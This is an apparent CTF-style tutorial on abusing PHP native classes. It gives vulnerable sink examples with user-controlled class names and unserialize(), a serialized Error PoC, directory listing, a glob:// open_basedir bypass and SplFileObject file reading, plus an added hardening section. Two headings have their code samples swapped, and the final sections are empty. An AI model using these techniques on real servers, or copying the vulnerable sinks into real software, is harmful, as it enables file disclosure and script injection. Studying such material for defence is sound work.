This article was last updated: 1 year ago
PHP Native Classes
Native exception classes
Error: (PHP 7, 8)
Exception: (PHP 5, 7, 8)
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $a = new Error($dir);   // user input becomes the Error message
    echo $a;                // Error::__toString() emits the message unescaped
}
```

Well, in that case, I have a bold idea...
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir   = $_GET['dir'];
    $class = $_GET['class'];
    $a = new $class($dir);  // class name and constructor argument both user-controlled
    echo $a;
}
```

Of course, in a normal environment a developer usually will not leave a user-controllable `new` of an arbitrary class in the program; what you are more likely to find is something like this:
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $a = unserialize($dir); // any class, including Error, can be rebuilt here
    echo $a;
}
```
Now we write the PoC:
```php
<?php
$a = new Error("<?php phpinfo();?>"); // the message is what __toString() prints
$b = serialize($a);
echo urlencode($b);
```
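For the unserialize() sink above, the following is an added hardening example (not code from the original post): the same payload is deserialized once unrestricted and once with `allowed_classes` restricted, and the value is escaped before it is echoed. `MyAppDto` is a hypothetical application class used only to illustrate an allowlist.

```php
<?php
// Constructed attacker-style input: a serialized Error whose message is markup.
$payload = serialize(new Error('<script>alert(1)</script>'));

// 1) Unrestricted unserialize(): the Error object is rebuilt, and because
//    Error::__toString() includes the message, a bare echo emits raw markup.
$unsafe = unserialize($payload);
$rebuilt = $unsafe instanceof Error;   // true: the attacker chose the class

// 2) Hardened (PHP 7.0+): refuse to instantiate any class. The data is kept,
//    but as __PHP_Incomplete_Class, which never reaches Error's behaviour.
$safe = unserialize($payload, ['allowed_classes' => false]);
$blocked = $safe instanceof __PHP_Incomplete_Class;  // true

// 3) If objects are genuinely needed, allow only the application's own
//    classes by name; Error, SplFileObject, SoapClient, ... are still
//    turned into __PHP_Incomplete_Class.
$restricted = unserialize($payload, ['allowed_classes' => ['MyAppDto']]);
$stillBlocked = $restricted instanceof __PHP_Incomplete_Class;  // true

// 4) Anything echoed to the browser is escaped; an object built from
//    user-controlled data is never echoed as-is.
function render($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The message now shows up as text in the page rather than as a script tag.
echo render($unsafe), "\n";
echo ($rebuilt && $blocked && $stillBlocked) ? "checks passed\n" : "checks failed\n";
```

The same allowlist idea applies to the `new $class($dir)` sink: compare `$class` against a fixed list of application classes before instantiating it.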

Native classes for reading directories:
DirectoryIterator: (PHP 5, 7, 8)
Reads a single file (or directory) name under the directory; to print all of them you need to loop.
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $a = new FilesystemIterator($dir);   // user-controlled directory path
    foreach ($a as $f) {
        echo $f->__toString() . '<br>';  // one entry name per iteration
    }
}
```

FilesystemIterator: (PHP 5 >= 5.3, 7, 8; a subclass of DirectoryIterator)
Both DirectoryIterator and FilesystemIterator have a __toString() method that converts the obtained result to a string.
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $a = new DirectoryIterator($dir);    // user-controlled directory path
    foreach ($a as $f) {
        echo $f->__toString() . '<br>';  // one entry name per iteration
    }
}
```

Combined with the glob:// pseudo-protocol, this can bypass the open_basedir restriction:

GlobIterator: (PHP 5 >= 5.3, 7, 8)
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $a = new GlobIterator($dir);         // user-controlled glob pattern
    foreach ($a as $f) {
        echo $f->__toString() . '<br>';  // one matching path per iteration
    }
}
```

Reading files:
SplFileObject:
```php
<?php
highlight_file(__FILE__);
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $a = new SplFileObject($dir);  // user-controlled file path
    foreach ($a as $f) {
        echo $f;                   // one line of the file per iteration
    }
}
```

SoapClient:
ReflectionMethod: